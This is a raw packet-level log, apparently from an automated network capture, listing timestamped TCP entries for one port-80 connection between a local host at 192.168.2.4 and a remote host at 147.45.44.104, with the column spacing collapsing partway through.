Oct 8, 2024 03:30:55.392997026 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393008947 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393125057 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393239021 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393254995 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393270016 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393289089 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393306017 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393322945 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393353939 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393353939 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393388033 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393405914 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393404007 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393431902 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393587112 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393605947 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393635035 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393778086 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.393821955 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.393980980 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395435095 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395451069 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395466089 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395482063 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395490885 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395503998 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395637035 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395662069 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395677090 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395684004 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395694017 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395709991 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395723104 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395728111 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395744085 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395747900 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395761013 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395776987 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395780087 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395792961 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395809889 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395811081 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395827055 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395843983 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395847082 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395862103 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395879030 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395881891 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395895958 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395911932 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395915031 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.395930052 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.395947933 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.404423952 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481235981 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481261015 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481277943 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481307030 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481323957 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481337070 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481342077 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481360912 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481379986 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481425047 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481425047 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481425047 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481725931 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481755972 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481770039 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481806040 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481874943 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481904030 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481920958 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481921911 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481939077 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481956005 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481967926 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.481971979 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.481997967 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482000113 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482017040 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482033968 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482039928 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482050896 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482068062 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482073069 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482088089 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482105970 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482166052 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482203960 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482209921 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482227087 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482261896 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482311010 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482326984 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482342005 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482357979 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482368946 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482400894 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482462883 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482479095 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482494116 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482512951 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482516050 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482530117 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482546091 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482547998 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482563972 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482580900 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482624054 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482640982 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482656002 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482669115 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482672930 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482690096 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482697010 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482706070 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482722998 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482728004 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482760906 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482784986 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482800961 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482816935 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482834101 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482844114 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482856989 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482872009 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.482949972 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482965946 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482983112 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.482990026 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483000040 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483016014 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483022928 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483032942 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483050108 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483058929 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483067989 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483087063 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483089924 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483114958 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483127117 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483131886 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483171940 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483196974 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483213902 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483228922 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483243942 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483258963 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483262062 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483275890 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483289003 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483293056 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483318090 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483361006 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483377934 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483406067 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483411074 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483453989 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483555079 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483582020 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483598948 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483614922 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483623981 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483632088 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483647108 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483655930 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483664036 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483680010 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483688116 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483696938 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483714104 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483719110 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483730078 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483745098 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483751059 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483762026 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483783960 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483789921 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483805895 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483820915 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483829021 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483858109 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.483972073 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.483988047 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484002113 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484021902 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484023094 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.484038115 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484052896 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484059095 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.484071016 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484086990 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484091043 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.484102964 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484117985 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484123945 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.484136105 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484153032 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.484180927 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484196901 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484214067 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484219074 CEST  49730        80          192.168.2.4     147.45.44.104
Oct 8, 2024 03:30:55.484222889 CEST  80           49730       147.45.44.104   192.168.2.4
Oct 8, 2024 03:30:55.484249115 CEST  80           49730       147.45.44.104   192.168.2.4
                                                  Oct 8, 2024 03:30:55.484253883 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.484266043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484282970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484287977 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.484298944 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484314919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484321117 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.484330893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484345913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484350920 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.484361887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484380007 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484381914 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.484416962 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.484498978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484514952 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484529018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484545946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.484551907 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.484586000 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.508467913 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.571981907 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572043896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572063923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572082043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572114944 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572132111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572139978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572153091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572170019 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572208881 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572324991 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572390079 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572402954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572418928 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572441101 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572463989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572477102 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572490931 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572508097 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572515965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572516918 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572532892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572552919 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572565079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572582006 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572582960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572593927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572623014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572624922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572639942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572649956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572664976 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572684050 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572683096 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572700024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572709084 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572721004 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572738886 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572743893 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572762966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572796106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572812080 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572829008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572844028 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572871923 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572873116 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572890997 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572906971 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572925091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572937965 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.572942972 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.572967052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573019028 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573035002 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573050022 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573062897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573065996 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573081970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573091984 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573100090 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573132992 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573187113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573203087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573218107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573232889 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573235035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573251963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573256969 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573297024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573302031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573313951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573332071 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573348999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573364973 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573379040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573388100 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573395967 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573414087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573438883 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573550940 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573565960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573581934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573596954 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573601961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573618889 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573632002 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573637009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573654890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573662996 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573674917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573748112 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573764086 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573780060 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573787928 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573788881 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573796988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573816061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573826075 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573833942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573852062 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573870897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573901892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.573935986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573952913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573967934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.573990107 CEST8049730147.45.44.104192.168.2.4
